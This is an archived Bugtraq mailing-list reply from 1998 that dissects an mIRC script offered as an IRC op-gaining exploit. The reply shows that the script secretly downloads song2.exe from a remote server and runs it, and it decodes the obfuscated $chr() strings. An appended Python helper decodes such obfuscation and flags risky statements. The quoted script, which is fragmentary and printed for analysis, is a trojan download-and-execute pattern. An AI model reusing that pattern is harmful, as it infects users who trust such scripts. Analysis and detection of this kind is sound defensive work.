[8558] in bugtraq
No subject found in mail header
daemon@ATHENA.MIT.EDU (Cacaio Torquato)
Sat Nov 14 20:18:34 1998
Date: Sat, 14 Nov 1998 19:37:29 -0200
Reply-To: Cacaio Torquato <cacaio@DEATHKNIGHTS.COM>
From: Cacaio Torquato <cacaio@DEATHKNIGHTS.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811131950.OAA02949@brampton1.netmatrix.net>
At 14:50 13/11/98 -0500, root@BRAMPTON1.NETMATRIX.NET wrote:
>Hi,
>while debugging/hexing/disassembling mirc my friend slotmech last week found
>a mirc bug which allows forcing users to send MODE commands to the server.
>this example script sends a MODE +o to the irc server. the mirc author has
>been notified of this but we didn't receive a response... my exploit+protection
>script is included. Expect more mirc stuff from us.
>
>
Are you nutz, man? Your code simply makes whoever wants to get ops fetch a file
from your server and execute it. I'm glad you weren't smart enough to put in
the full address of your server.
For those who want to know exactly what's happening, I will explain the code
step by step.
Your attempt to install your file on everyone who wants to hack ops was
funny, just funny...
>alias hackop {
>...
> checklen $1
>...
>}
calls the function checklen (see below)
>
>alias checklen {
> .if (%xcomplete == 1) halt
> .if (%xinprog == 1) halt
> .set %xfilename song2.exe
> .set %xlof $lof(%xfilename)
> .set %xfirst 1
> .write -c %xfilename
sets the filename to song2.exe and clears it if something is in it already.
> ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
101 - 1$ .sockclose protx
if this line is uncommented, it displays the following message on the screen:
d o n t - s p o i l - t h e
> .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
$chr$}
opens a socket connection to the designated server. The one placed in his
code is www.g (I think he forgot the rest)
>on 1:sockopen:protx: {
> .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
$chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47)
$+ $chr(57) $+ $c$ .sockwrite -n protx
>}
when this socket connection is opened, he sends the request 'GET /Belta/9' to
the server and starts receiving data
>on 1:sockread:protx: {
> .sockread &test
> .set %xlof $lof(%xfilename)
> .if (%xfirst == 1) set %xlof 0
> .set %xfirst 0
> .bwrite %xfilename %xlof $sockbr &test
>}
just receives the data and writes it to a file
>on 1:connect:checklen
Why is it here? Because when the user connects to the IRC server, the
script will grab the file again, and again, and again.
>on 1:sockclose:protx: {
> .sockread &test
> if ($sockbr > 0) {
> .set %xlof $lof(%xfilename)
> .bwrite %xfilename %xlof $sockbr &test
> }
finishes writing the file
> .if ($lof(%xfilename) == 178306) {
> .run %xfilename
> .set %xcomplete 1
> }
if the size of the file, in bytes, is equal to 178306, it runs the file
> if ($lof(%xfilename) != 178306) {
> .timer 1 300 checklen
> }
if the size of the file, in bytes, is less than 178306, it starts a timer that
will get the file again in 300 seconds
> }
> unset %xinprog
> unset %xfilename
> unset %xlof
> unset %xfirst
>}
>
unsets the garbage variables
-----------
that's it
Best regards,
--
Cacaio Torquato http://www.deathknights.com/cacaio
The Death Knights http://www.deathknights.com zelur xuniL () -O)
Tedio INC. http://www.tedio.org Think Blue. /\ /\\
_\_V
+-------------------------------------------------------+
| BrasNet IRC Servers Network - Brazil |
| irc.brasnet.org irc.webtech.com.br |
| irc.sol.com.br |
+-------------------------------------------------------+
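The decoding Cacaio does by hand above (turning the $chr() chains back into "GET /Belta/9", "www.g" and "dont-spoil-the") can be automated when reviewing an mIRC script before loading it. The helper below is an added example and not part of the original thread; the sample script is constructed in the style of the quoted code (the original lines arrived truncated), and the $chr(100 111 ...) multi-code form is expanded only because the quoted script uses it that way.

```python
import re

# Constructed sample in the style of the quoted script (not the original
# post's exact lines, which were truncated in the archive).
SAMPLE_SCRIPT = """\
alias checklen {
  .set %xfilename song2.exe
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101)
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103)
}
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66)
}
on 1:sockclose:protx: {
  .run %xfilename
}
"""

# $chr( ... ) with one code, or the poster's space-separated multi-code form.
_CHR = re.compile(r"\$chr\(([\d\s-]+)\)")
# mIRC's $+ concatenation operator plus the whitespace around it.
_JOIN = re.compile(r"\s*\$\+\s*")

# Statements a reviewer should look at closely in a script someone hands out.
WATCHLIST = ("sockopen", "sockwrite", "bwrite", ".run", "on 1:connect")


def decode_chr_tokens(line: str) -> str:
    """Expand every $chr(N) into its character and remove the $+ glue."""
    def _expand(m: re.Match) -> str:
        # Digit tokens become characters; anything else (e.g. '-') is literal.
        return "".join(chr(int(t)) if t.isdigit() else t
                       for t in m.group(1).split())
    return _JOIN.sub("", _CHR.sub(_expand, line))


def analyze(script: str):
    """Return (line_no, decoded_line, hits) for lines that were obfuscated
    or that use a watchlisted statement."""
    findings = []
    for no, raw in enumerate(script.splitlines(), 1):
        decoded = decode_chr_tokens(raw)
        hits = [w for w in WATCHLIST if w in decoded]
        if decoded != raw or hits:
            findings.append((no, decoded.strip(), hits))
    return findings


if __name__ == "__main__":
    for no, line, hits in analyze(SAMPLE_SCRIPT):
        print(f"{no:3}: {line}    {hits or ''}")
```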